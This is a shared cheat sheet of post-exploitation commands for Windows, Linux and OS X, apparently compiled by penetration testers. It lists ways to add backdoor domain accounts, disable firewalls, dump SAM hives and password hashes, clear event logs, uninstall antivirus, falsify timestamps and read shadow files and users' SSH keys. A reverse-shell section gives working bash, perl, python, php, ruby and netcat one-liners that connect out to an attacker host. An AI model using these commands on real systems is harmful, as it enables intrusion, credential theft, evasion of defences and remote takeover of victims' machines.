post exploit

Upload: research-guy

Post on 06-Apr-2018


8/3/2019 Post Exploit
1/22

Windows Post Exploitation Command List

# Blind files (things to pull when all you can do is blindly read) LFI/dir traversal
%SYSTEMDRIVE%\boot.ini

# System
## example: COMMAND [syntax1] | [syntax2] (explanation1; explanation2)
whoami
whoami /all
set
qwinsta
qprocess *
at
schtasks [/query /fo csv /v]
net start
sc getkeyname "Shell Hardware Detection" (use the display name from net start; quote it when it contains spaces)
sc qc ShellHWDetection (use the key name returned by getkeyname)
net config workstation
net time
net file
net session
net use
tasklist [/m] | [/svc] | [/m {dll}]
fsutil fsinfo drives

# Networking
ipconfig /all
ipconfig /displaydns
netstat -bano
netstat -s -p [tcp|udp|icmp|ip]
netstat -r
netstat -na | findstr :445
netstat -nao | findstr LISTENING (XP and up; the -o flag gives the PID, zuk)
netstat -na | findstr LISTENING (any Windows, generic)
netsh diag show all
net view
net view /domain
net view /domain:otherdomain
net user hacker hacker /add /domain (adds a user to the current domain -invasive-)
net user %USERNAME% /domain
net user /domain
net accounts
net accounts /domain
net localgroup administrators
net localgroup administrators /domain (this was supposed to combine localgroup and domain, but it is actually another way of getting the *current* domain admins. Zuk)
net group "domain admins" /domain
net group "enterprise admins" /domain
net group "domain controllers" /domain

nbtstat -a [ip_here]
net share
net session | find /c \\
arp -a
route print
netsh firewall set opmode disable (turns off the firewall -invasive-)
netsh firewall set opmode enable (enables the firewall -might cause loss of connection-)

# Configs
gpresult /z
sc qc [Service name]
sc query
sc queryex
type %WINDIR%\System32\drivers\etc\hosts
dir %PROGRAMFILES%
echo %COMSPEC%

# Finding important files
tree C:\ /f
dir /a
dir /b /s [Directory or filename]
Command | find /c /v "" (counts the lines of output)

# Files to pull if possible
%WINDIR%\repair\sam
%WINDIR%\System32\drivers\etc\hosts

# Remote System Access
net share \\computername
tasklist /V /S computername
net share nothing$=C:\ /grant:hacker,FULL /unlimited -invasive-
#net user hacker hacker /add
#net localgroup administrators /add hacker
#net use X: \\target\nothing$ hacker /USER:hacker
qwinsta /SERVER:computername
qprocess /SERVER:computername *
net use \\computername (maps IPC$, which does not show up as a drive)
net use \\computername /user:DOMAINNAME\username password (maps IPC$ under another username)
net time \\computername (shows the time of the target computer)
dir \\computername\share_or_admin_share\ (lists a remote directory)
tasklist /V /S computername
Lists tasks, with the users running them, on a remote system. This removes any IPC$ connection after it is done, so if you are using another user you need to re-initiate the IPC$ mount.
# WMI
wmic bios
wmic qfe
wmic qfe get hotfixid (gets the installed patch IDs)
wmic startup
wmic service
wmic os
wmic process get caption,executablepath,commandline
wmic process call create process_name (executes a program)
wmic process where name="process_name" call terminate (terminates a program)
wmic logicaldisk where drivetype=3 get name,freespace,systemname,filesystem,size,volumeserialnumber (hard drive information)
wmic useraccount (usernames, SIDs, and various security related goodies)
wmic useraccount get /ALL
wmic share get /ALL (you can use ? to get help!)
wmic startup list full (this can be a huge list!!!)
wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about the target)

# Reg Command
reg save HKLM\Security security.hive (save the Security hive to a file)
reg save HKLM\System system.hive (save the System hive to a file)
reg save HKLM\SAM sam.hive (save the SAM hive to a file)
reg add [\\TargetIPaddr\] [RegDomain]\[Key]
reg export [RegDomain]\[Key] [FileName]
reg import [FileName]
reg query [\\TargetIPaddr\] [RegDomain]\[Key] /v [Valuename] (add /s to recurse through all values)

# Deleting Logs
wevtutil el (list logs)
wevtutil cl [LogName] (clear a specific log)
del %WINDIR%\*.log /a /s /q /f

# Uninstalling Software / AntiVirus (non-interactive)
wmic product get name /value (this gets software names)
wmic product where name="XXX" call uninstall /Interactive:Off (this uninstalls the software)

# Other
pkgmgr /iu:Package
pkgmgr /iu:TelnetServer (install the Telnet service ...)
pkgmgr /iu:TelnetClient (client)
rundll32.exe user32.dll,LockWorkStation (locks the screen -invasive-)
wscript.exe
cscript.exe
## OS SPECIFIC
# Win2k3
winpop stat domainname
# Vista/7
winstat features
wbadmin get status
wbadmin get items
gpresult /H gpols.htm

(Page break just so we can have the straight-up cmds on their own)

## Meterpreter Commands
ps (show running processes and their associated users/id numbers)
getuid
getpid
getprivs (shows current privileges)
getsystem (attempts to get SYSTEM; be warned, it attempts the Kitrap0d local exploit as well)
sysinfo

timestomp (remove/screw up timestamps; done well, this messes up audit tools)
clearev
hashdump (dump SAM file hashes for pass-the-hash or cracking) or run hashdump
migrate [pid number] (move from the exploited process into another process)

## Useful Meterpreter Scripts

## Useful Meterpreter Post Modules
vsploit
post/windows/gather/smart_hashdump
post/windows/gather/credentials/vnc
post/windows/escalate/bypassuac (mixed results)

## Useful Techniques
Pass The Hash attack (gain access to other computers with stolen hashes, no cracking involved)
Change Wallpaper
Ex: You have to upload a file called wallpaper.bmp to the C: drive

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_MULTI_SZ /d "C:\wallpaper.bmp"
rundll32.exe user32.dll,UpdatePerUserSystemParameters

## GOING TO MOVE EVERYTHING HERE FOR LEGIBILITY ONCE EDITING DIES DOWN
-=SYSTEM=-
Command        Expected and/or Sample Output
whoami         Returns the username you're logged in as.
systemconfig

Linux/Unix/BSD Post Exploitation Command List

# Blind files (things to pull when all you can do is blindly read) LFI/dir traversal
/etc/resolv.conf (everyone always has read on this and it won't trigger an IDS)
/etc/motd, /etc/issue

# System

uname -a
ps aux
ps -aef
id
arch
w
who -a
gcc -v
mysql --version
perl -v
ruby -v
python --version
df -k
mount
last -a
lastlog
lastlogin (*bsd)
getenforce
dmesg
lspci
lsusb
lshw
free -m
cat /proc/cpuinfo
cat /proc/meminfo
du -h --max-depth=1 /

which nmap (see if it's already installed)
locate bin/nmap
which nc (see if it's already installed)
locate bin/
whoami
jps -l

# Networking
hostname -f
ip addr show
ifconfig -a
route -n
cat /etc/network/interfaces
iptables -L -n
netstat -anop
netstat -r
netstat -nltupw (root with raw sockets)
arp -a
lsof -nPi

# Configs
cat /etc/issue{,.net}
cat /etc/passwd

cat /etc/shadow (gotta try..)
cat /etc/shadow~ # (sometimes there when edited with gedit)
cat /etc/master.passwd
cat /etc/group
cat /etc/hosts
cat /etc/crontab
cat /etc/sysctl.conf
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (lists all crons)
cat /etc/resolv.conf
cat /etc/lsb-release
cat /etc/redhat-release
cat /etc/samba/smb.conf
pdbedit -L -w
pdbedit -L -v
cat /etc/exports
cat /etc/auto.master
cat /etc/auto_master
cat /etc/fstab
find /etc/sysconfig/ -type f -exec cat {} \;
cat /etc/sudoers

# Determine Distro:
/etc/SUSE-release # Novell SUSE
/etc/redhat-release, /etc/redhat_version # Red Hat

/etc/fedora-release # Fedora
/etc/slackware-release, /etc/slackware-version # Slackware
/etc/debian_release, /etc/debian_version # Debian
/etc/mandrake-release # Mandrake
/etc/sun-release # Sun JDS
/etc/release # Solaris/Sparc
/etc/gentoo-release # Gentoo
/etc/lsb-release # Ubuntu
?? # Arch Linux
arch # on OpenBSD; sample: OpenBSD.amd64
uname -a (often hints at it pretty well)

# Installed Packages
rpm -qa --last | head
yum list | grep installed
dpkg -l
dpkg -l | grep -i linux-image
pkg_info # FreeBSD

# Package Sources
cat /etc/apt/sources.list
ls -l /etc/yum.repos.d/

cat /etc/yum.conf

# Finding Important Files
find /var/log -type f -exec ls -la {} \;
ls -alhtr /mnt
ls -alhtr /media
ls -alhtr /tmp
ls -alhtr /home
ls /home/*/.ssh/*
find /home -type f -iname '.*history'
ls -lart /etc/rc.d/
locate tar | grep [.]tar$
locate tgz | grep [.]tgz$
locate sql | grep [.]sql$
locate settings | grep [.]php$
locate config.inc | grep [.]php$
ls /home/*/id*
locate .properties | grep [.]properties # java config files
locate .xml | grep [.]xml # java/.net config files
find /sbin /usr/sbin /opt /lib `echo $PATH | sed 's/:/ /g'` -perm -4000 # find suids

## Per User
ls -alh /home/*/
ls -alh /home/*/.ssh/

cat /home/*/.ssh/authorized_keys
cat /home/*/.ssh/known_hosts
cat /home/*/.*hist*
find /home/*/.vnc /home/*/.subversion -type f
grep ^ssh /home/*/.*hist*
grep ^telnet /home/*/.*hist*
grep ^mysql /home/*/.*hist*
cat /home/*/.viminfo
sudo -l # if sudoers is not readable, this sometimes works per user
crontab -l

## Priv (sudo'd or as root)
ls -alh /root/
cat /etc/sudoers
cat /etc/shadow
cat /etc/master.passwd # OpenBSD
cat /var/spool/cron/crontabs/*
lsof -nPi
ls /home/*/.ssh/*

## Reverse Shell
starting list sourced from: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i &3 2>&3");'
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i &%d 2>&%d",f,f,f)'
nc -e /bin/sh 10.0.0.1 1234 # note: some versions need -l, and many do NOT support -e anymore
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
xterm -display 10.0.0.1:1
Listener: Xnest :1
Add permission to connect: xhost +victimIP

## GOING TO MOVE EVERYTHING HERE FOR LEGIBILITY ONCE EDITING DIES DOWN
-=SYSTEM=-
Command    Expected and/or Sample Output
uname -a   Linux kernel version, distribution
ps aux     List of running processes
id         List current user and group along with user/group id
w          Show who is logged in and what they are doing

who -a     Print information about users

OSX Post Exploitation Command List

# Blind files (things to pull when all you can do is blindly read) LFI/dir traversal
/etc/resolv.conf (everyone always has read on this and it won't trigger an IDS)

# SYSTEM
uname -a
sw_vers -productName
sw_vers -productVersion
system_profiler
id
printenv
who
ps aux
ps ea
ls -alh /Applications/
"/Library/Application Support/VMware Fusion/vmrun" list
"/Library/Application Support/VMware Fusion/vmrun" CopyFileFromHostToGuest windowsmalicious.exe WindowsVM
"/Library/Application Support/VMware Fusion/vmrun" captureScreen WindowsVM

Snow Leopard and Lion
dscacheutil -q user
dscacheutil -q group
Tiger
lookupd -q user
lookupd -q group

# Networking
ifconfig
netstat -np tcp
netstat -np udp

# Configs
ls -alh /private/etc/

# Finding Important Files
ls -ma ~/
ls -alh /Users/
ls -alh /Users/*/.ssh/
ls -alh /Users/*/.gnupg/

# Files to pull

# Remote System Access

# Priv
cat "/Library/Application Support/Objective Development/Little Snitch/rules.xpl"
ls "/Library/Application Support/VMware Fusion/licenses/site/"
